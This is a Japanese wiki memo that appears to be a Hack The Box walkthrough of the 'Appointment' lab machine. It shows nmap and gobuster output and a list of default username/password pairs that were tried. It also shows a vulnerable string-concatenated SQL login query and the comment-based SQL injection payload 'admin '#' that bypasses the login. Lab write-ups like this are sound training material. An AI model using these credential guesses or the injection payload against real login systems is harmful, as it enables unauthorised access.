HTB_Appointment - meruneru/tech_memo GitHub Wiki
イントロのマシン
#SQL のマシン。
#OWASP のサイトにWebの攻撃カテゴリがまとまっている。 OWASP Top 10 Web Application Security Risks
#ポート80 は、 #HTTP サーバ。 #ポート443 は #HTTPS だが、開いてない。
mqqq $nmap -sV -sC -Pn 10.129.182.193
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-12 23:20 UTC
Nmap scan report for 10.129.182.193
Host is up (0.078s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Login
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.15 seconds
#gobuster で探索してみたが、怪しいフォルダやファイルは無かった。
lq[htb-meruneru@htb-zs1gibg6pb]q[~]
mqqq $gobuster dir -u 10.129.182.193 -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.182.193
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/13 01:16:54 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://10.129.182.193/images/]
/css (Status: 301) [Size: 314] [--> http://10.129.182.193/css/]
/js (Status: 301) [Size: 313] [--> http://10.129.182.193/js/]
/vendor (Status: 301) [Size: 317] [--> http://10.129.182.193/vendor/]
/fonts (Status: 301) [Size: 316] [--> http://10.129.182.193/fonts/]
===============================================================
2021/11/13 01:28:24 Finished
===============================================================
ブラウザでhttp://10.129.182.193にアクセスするとログインページが開いた。
ID/PWにadminやrootやguest等を試してみたが入れず。
admin:admin
guest:guest
user:user
root:root
administrator:password
username , passwordはサーバ側のPHP等で処理されてSQL DBからデータ取得できるかどうかでログイン成功/失敗を見ているのではないか?という推測すると、 #SQLInjection を試し見る。
下記のようなコードを想定して攻撃してみる。
$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";selectで1件一致していればログイン成功とみなすロジックだったので、無事にログイン成功した。 ログイン画面にフラグがあった。
username: admin '#
password: tekitou